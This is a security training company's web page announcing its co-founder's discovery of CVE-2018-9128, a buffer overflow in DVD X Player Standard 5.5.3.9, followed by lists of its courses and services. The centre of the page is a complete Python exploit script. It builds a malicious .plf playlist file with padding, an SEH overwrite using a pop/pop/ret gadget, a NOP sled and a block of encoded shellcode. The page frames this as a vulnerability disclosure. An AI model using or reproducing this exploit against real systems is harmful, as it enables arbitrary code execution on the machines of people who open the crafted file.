Indian Cyber Security Solutions - ICSS

(An ISO 27001 & 9001 Certified Company) A unit of Green Fellow IT Security Solutions Pvt Ltd

info@indiancybersecuritysolutions.com
For any grievance mail us to: grievance@indiancybersecuritysolutions.com

+91-8972107846 / +91-6291980077/ +91-6289183381 /+91-8420488199 / 033-46027398

Snow

Forest

Mountains

Snow

Snow

DVD X Player Standard 5.5.3.9 – Buffer Overflow | CVE-2018-9128

CVE-2018-9128: DVD X Player Standard 5.5.3.9 – Buffer Overflow

CVE-2018-9128 discovered by ICSS team member Prasenjit Kanti Paul who is the Co-Founder of ICSS. The Exploit is published on Exploit DB on 10-04-2018. It’s an achievement for Indian Cyber Security Solutions. The Exploit details are as follows:

Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9

Date: 29-03-2018

CVE: CVE-2018-9128

Author: Prasenjit Kanti Paul

Overview:

file = open(“exploit_dvdx_player_standard_5.5.3.9.plf”,”w”)

buffer = “\x41” * 608

next_seh = “\xeb\x06\x90\x90”

seh = “\xBC\x13\x5F\x02” # pop/pop/ret : EchoDelayProcess.dll

nops = “\x90” * 100

Proof of Concept

buf = “”

buf += “\xda\xd4\xd9\x74\x24\xf4\xb8\xb3\xb9\xc8\xae\x5a\x31”

buf += “\xc9\xb1\x53\x83\xc2\x04\x31\x42\x13\x03\xf1\xaa\x2a”

buf += “\x5b\x09\x24\x28\xa4\xf1\xb5\x4d\x2c\x14\x84\x4d\x4a”

buf += “\x5d\xb7\x7d\x18\x33\x34\xf5\x4c\xa7\xcf\x7b\x59\xc8”

buf += “\x78\x31\xbf\xe7\x79\x6a\x83\x66\xfa\x71\xd0\x48\xc3”

buf += “\xb9\x25\x89\x04\xa7\xc4\xdb\xdd\xa3\x7b\xcb\x6a\xf9”

buf += “\x47\x60\x20\xef\xcf\x95\xf1\x0e\xe1\x08\x89\x48\x21”

buf += “\xab\x5e\xe1\x68\xb3\x83\xcc\x23\x48\x77\xba\xb5\x98”

buf += “\x49\x43\x19\xe5\x65\xb6\x63\x22\x41\x29\x16\x5a\xb1”

buf += “\xd4\x21\x99\xcb\x02\xa7\x39\x6b\xc0\x1f\xe5\x8d\x05”

buf += “\xf9\x6e\x81\xe2\x8d\x28\x86\xf5\x42\x43\xb2\x7e\x65”

buf += “\x83\x32\xc4\x42\x07\x1e\x9e\xeb\x1e\xfa\x71\x13\x40”

buf += “\xa5\x2e\xb1\x0b\x48\x3a\xc8\x56\x05\x8f\xe1\x68\xd5”

buf += “\x87\x72\x1b\xe7\x08\x29\xb3\x4b\xc0\xf7\x44\xab\xfb”

buf += “\x40\xda\x52\x04\xb1\xf3\x90\x50\xe1\x6b\x30\xd9\x6a”

buf += “\x6b\xbd\x0c\x06\x63\x18\xff\x35\x8e\xda\xaf\xf9\x20”

buf += “\xb3\xa5\xf5\x1f\xa3\xc5\xdf\x08\x4c\x38\xe0\x32\x5f”

buf += “\xb5\x06\x50\x4f\x90\x91\xcc\xad\xc7\x29\x6b\xcd\x2d”

buf += “\x02\x1b\x86\x27\x95\x24\x17\x62\xb1\xb2\x9c\x61\x05”

buf += “\xa3\xa2\xaf\x2d\xb4\x35\x25\xbc\xf7\xa4\x3a\x95\x6f”

buf += “\x44\xa8\x72\x6f\x03\xd1\x2c\x38\x44\x27\x25\xac\x78”

buf += “\x1e\x9f\xd2\x80\xc6\xd8\x56\x5f\x3b\xe6\x57\x12\x07”

buf += “\xcc\x47\xea\x88\x48\x33\xa2\xde\x06\xed\x04\x89\xe8”

buf += “\x47\xdf\x66\xa3\x0f\xa6\x44\x74\x49\xa7\x80\x02\xb5”

buf += “\x16\x7d\x53\xca\x97\xe9\x53\xb3\xc5\x89\x9c\x6e\x4e”

buf += “\xb7\x6d\xa2\x5b\x20\xd4\x57\x26\x2c\xe7\x82\x65\x49”

buf += “\x64\x26\x16\xae\x74\x43\x13\xea\x32\xb8\x69\x63\xd7”

buf += “\xbe\xde\x84\xf2”

file.write(buffer + next_seh + seh + nops + buf)

file.close()

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students

Network Penetration Testing training

Ethical Hacking training

Internet Of Things Training

Internet Of Things Training Hyderabad

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development training

Secured Coding in Java

Certified Network Penetration Tester

Diploma in Web Application Security

Certified Web Application Penetration Tester

Certified Android Penetration Tester

Certified Python Programming

Advance Python Training

Reverse Engineering Training

Amazon Web Services Training

VMware Training

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Other Location for Online Courses:

© 2015 Indian Cyber Security Solutions|Indian Cyber Security Solutions